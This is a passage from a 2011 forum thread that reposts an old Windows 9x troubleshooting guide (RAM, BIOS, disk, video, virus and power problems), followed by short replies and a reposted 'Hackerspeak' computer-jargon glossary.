    To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.


    2 Bad Ram


    Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.


    But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.


    One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.


    Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.


    EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.


    3 BIOS settings


    Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.


    Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.


    A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.


    Microsoft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this).


    4 Hard disk drives


    After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to


    * Start-Programs-Accessories-System Tools-Disk Defragmenter


    This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.


    The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).


    Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to


    * Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.


    Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.


    Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to


    * Start-Programs-Accessories-System Tools-ScanDisk


    Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.


    5 Fatal OE exceptions and VXD errors


    Fatal OE exception errors and VXD errors are often caused by video card problems.


    These can often be resolved easily by reducing the resolution of the video display. Go to


    * Start-Settings-Control Panel-Display-Settings


    Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.


    If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to


    * Start-Settings-Control Panel-System-Device Manager


    Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.


    If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.


    The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.


    Another useful way to resolve video problems is to go to


    * Start-Settings-Control Panel-System-Performance-Graphics


    Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).


    Look up your video card's manufacturer on the internet and search for the most recent drivers for it.


    6 Viruses


    Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to


    * Start-Settings-Control Panel-Add/Remove Programs


    Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.


    A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.


    An excellent antivirus programme is McAfee VirusScan by Network Associates. Another is Norton AntiVirus 2000, made by Symantec.


    7 Printers


    The action of sending a document to print creates a bigger file, often called a postscript file.


    Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.


    If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.


    8 Software


    A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.


    The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.


    Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from Macecraft Software.


    Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.


    Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.


    Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.


    Remember to restore all the BIOS settings back to their former settings following installation.


    9 Overheating


    Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.


    One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from ComputerNerd.com or coolit.com


    CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.


    10 Power supply problems


    With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.


    If this has become a nuisance for you then consider buying an uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.


    It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.
     
  3. Sooth

    Sooth JF-Expert Member

    #3
    Jun 18, 2011
    Joined: Apr 27, 2009
    Messages: 1,894
    Likes Received: 662
    Trophy Points: 280
    I get you, brother, it seems detailed enough. I hope the 'youth' will have the drive to learn and to try, for good purposes only. I'm thinking of using it sometime later.
     
  4. MziziMkavu

    MziziMkavu JF-Expert Member

    #4
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    You need to know everything about computers, and only then will you be able to protect yourself against viruses, hackers, spam, spyware and worms. Once you know how enemies can build weapons and attack, then you too can look for a way to protect yourself. Chief, I wish you every success.
     
  5. MziziMkavu

    MziziMkavu JF-Expert Member

    #5
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    A Short 'HACKERSPEAK' Glossary
    -
    A reference to a few of the terms used by many computer hackers.
    -
    (Researched and compiled by members of the Hollywood User Group)
    -


    arg - (argh) noun. An argument, in the mathematical sense.


    automagically - adverb. Automatically, but in a way which, for some
    reason (for example, because it's too complicated or too trivial) the
    speaker doesn't feel like explaining.


    bells and whistles - n. Unnecessary (but often convenient, useful,
    good-looking, or amusing) features of a program or other object. Added
    to a bare-bones, working program.


    bit - n. 1) A unit of information obtained by asking a question (e.g.
    - 'I need a few bits about Punter protocol') 2) A mental flag;
    reminder that something should be done eventually.


    buffer - verb. The act of saving or setting aside something to be done
    later. (e.g. - 'I'm going to buffer that and go eat now').


    bug - n. A problem or mistake; unwanted property or side effect.
    Usually of a program, but can refer to a person. Can be very simple or
    very complicated. Antonym: FEATURE.


    bum - v. To improve something by rearranging or removing its parts.
    Most often done to a program to increase speed or save memory space,
    usually at the expense of clarity.


    buzz - v. Of a program, to run without visible progress or certainty
    of finishing. Resembles CATATONIA except that a buzzing loop may
    eventually end.


    canonical - (ki NAHN i kil) adjective. Standard, usual or ordinary way
    of doing something.


    catatonia - n. A condition in which something is supposed to happen,
    but nothing does. (e.g. - Nothing you type will appear on the screen.
    It's catatonic. Often means a CRASH has occurred.)


    crash - 1) n. Sudden, drastic failure. Usually refers to a complete
    computer system or program. 2) v. To fail suddenly or cause to fail.
    3) v. Of people, to go to sleep.


    creeping featurism - n. Tendency for anything complicated to become
    even more so because people keep saying, 'Hey, it would be terrific if
    the program had this feature, and could do this, and...' The result is
    a patchwork program, confusing to read, with a lot of 'neat' features.


    crock - n. Said of a program that works, but in an extremely awkward
    or cumbersome manner.


    crunch - v. To process, usually in a time-consuming, complex way.
    Example: Performing large, repetitive numerical computations is called
    'number crunching'. 2) v. To reduce the size of a file (often in a
    complicated way) to save space.


    dec'ed out - (decked out) adj. Stoned, drunk (and possibly trying to
    program, regardless). Uncomplimentary. Derives from the 65-- series
    ML opcode DECrement, i.e.: decrease a value.


    elegant - adj. Said of a piece of code that does the RIGHT THING in a
    way beautiful to look at.


    feature - n. An extra property or behaviour added to a program that
    already does the job. May or may not be useful, necessary or
    convenient.


    fencepost error - n. A mathematical 'off-by-one' error. Most often
    found in programs that must count loops (it will count one time too
    many, or too few). Term comes from the problem: 'If you build a fence
    100 feet long with posts 10 feet apart, how many posts do you need?'
    Example: Suppose you want to process an array of items x thru y. How
    many are there? The correct answer is x-y+1 (not x-y, which would be
    off by one).


    flavor - n. variety, kind, type. (flavorful - adj. Aesthetically
    pleasing).


    flush - v. To scratch, delete or destroy something. Often something
    superfluous or useless.


    fudge - v. Perform in an incomplete, but marginally acceptable way.
    'I fudged it, so it works.'


    GC - (jee see) 1) v. To clean up, throw away useless things. 2) To
    forget. GC is an abbreviation of the term 'Garbage Collection', the
    common method of freeing up memory space.


    glitch - n. Sudden interruption in electrical service, common sense,
    or program function. Usually happens only when you pray that it
    doesn't.


    grovel - v. To work interminably, examine minutely or in extreme
    detail.


    gun - v. To forcibly terminate a program. 'It was a boring display,
    so I gunned it.'


    hack - n. An appropriate application of ingenuity. It could be a
    quick-and-dirty bug fix, or a time-consuming and elegant work of art.
    A clever technique.


    hack value - n. The motivation for expending effort and time toward a
    seemingly pointless goal, the point being the resulting hack.


    hack attack - n. Period of greatly increased hacking activity. Not to
    be confused with a Mac-Attack.


    hacker - n. 1) One who greatly enjoys learning the details of a
    computer system and how to stretch their capabilities (as opposed to
    REAL USERS who learn only the minimum amount necessary). 2) One who
    programs enthusiastically, rather than just theorizing about it. 3)
    One capable of appreciating HACK VALUE. 4) An expert of any kind 5) A
    malicious or inquisitive meddler (in the case of a 'system hacker' or a
    'password hacker').


    inc it up - (also 'incing') v. Specifically related to studying,
    reading, or learning ML. Derives from the 65-- series ML instruction
    INCrement a value; i.e. increase it.


    jock - n. Programmer characterized by the large, cumbersome,
    brute-force programs he/she writes. The programs may work, but slowly,
    inelegantly, or in an ugly way.


    kludge - (kloog) 1) n. Clever programming trick, most often to fix a
    bug. Efficient, but maybe unclear. 2) v. To insert a kludge into a
    program (to fix a bug or add a feature).


    magic - adj. Something as yet unexplained or too complex to imagine.


    M&M's - n. Mental and Midget; i.e. Mental Midget. Uncomplimentary
    term applied most often to 'system hackers' who intrude for disruptive
    or destructive purposes (like to crash BBS's).


    misfeature - n. A FEATURE that eventually turns out to be more trouble
    than it was worth, possibly because it is inadequate for a new user or
    situation that has evolved. Misfeatures are different from bugs or
    side-effects in that they are often more basic to the program design
    and, at one time, were carefully planned.


    moby - 1) adj. Immense, complex, or impressive. 2) n. Total size of
    a computer's address space.


    mode - n. A general state. Examples: DAY MODE - state a person is in
    when s/he is working days and sleeping nights.


    mumble - interjection. Said when the correct response is too
    complicated to put into words or has not been thought out. Can
    indicate a reluctance to enter a long discussion.


    mumblage - n. The subject matter of one's mumbling. Replaces 'all
    that stuff'.


    nop around (or nopping) - v. Hanging out; not doing much; not
    programming. Derives from the 65-- series ML instruction code 'NOP'
    (No OPeration).


    obie (or o.b.) - n. Derives from a pun with the word 'OverByte'.
    Usually relates to a ML routine that doesn't work because of some
    small mistake, possibly an incorrect addressing mode or even a typing
    error. Most often one or two bytes wrong.


    patch - 1) n. Piece of code intended as a quick-and-dirty remedy to a
    BUG or MISFEATURE. 2) v. To fix something temporarily; insert a patch
    into a piece of code; make the main program machine-specific.


    punt - v. To give up; decide not to do.


    rave - v. 1) To persist in discussing something. 2) To speak
    authoritatively about that which one knows very little. 3) To
    proselytize.


    real user - n. A commercial user; a non-hacker who uses computer
    applications only.


    Real World, The - n. 1) Places where programs have only business
    applications. 2) Institutions such as IBM. 3) The location of
    non-programmers and non-programming activity. The first two
    definitions are uncomplimentary; the third is not.


    Right Thing, The - n. that which is obviously the appropriate thing to
    use, do, say, etc.


    rude - (rood or roo-day) adj. Programs badly written or functionally
    poor.


    sacred - adj. Reserved for the exclusive use of something. Usually
    refers to memory location or register that shouldn't be used because
    what is stored there must not change.


    slurp - v. To read a large data file into memory before using or
    processing data.


    smart - adj. Said of a program (or something) that does THE RIGHT
    THING.


    SMOP - n. An acronym for a 'Small Matter Of Programming'. A piece of
    code that would not at all be hard to write, but would take a very long
    time because of its size. Not worth the trouble.


    snail mail - n. Mail sent via Post Office, rather than electronically.


    software rot - n. Hypothetical disease that causes working programs to
    stop working when unused for a period of time.


    tense - adj. Of programs, very clever and efficient. A tense
    programmer produces tense code.


    vanilla - adj. Standard, usual, or ordinary FLAVOR.


    zero - v. 1) To set a bit or variable to zero. 2) To erase, or
    discard all data from.


    zorch - v. 1) To move quickly. 2) Influences. 3) Energy or ability.
     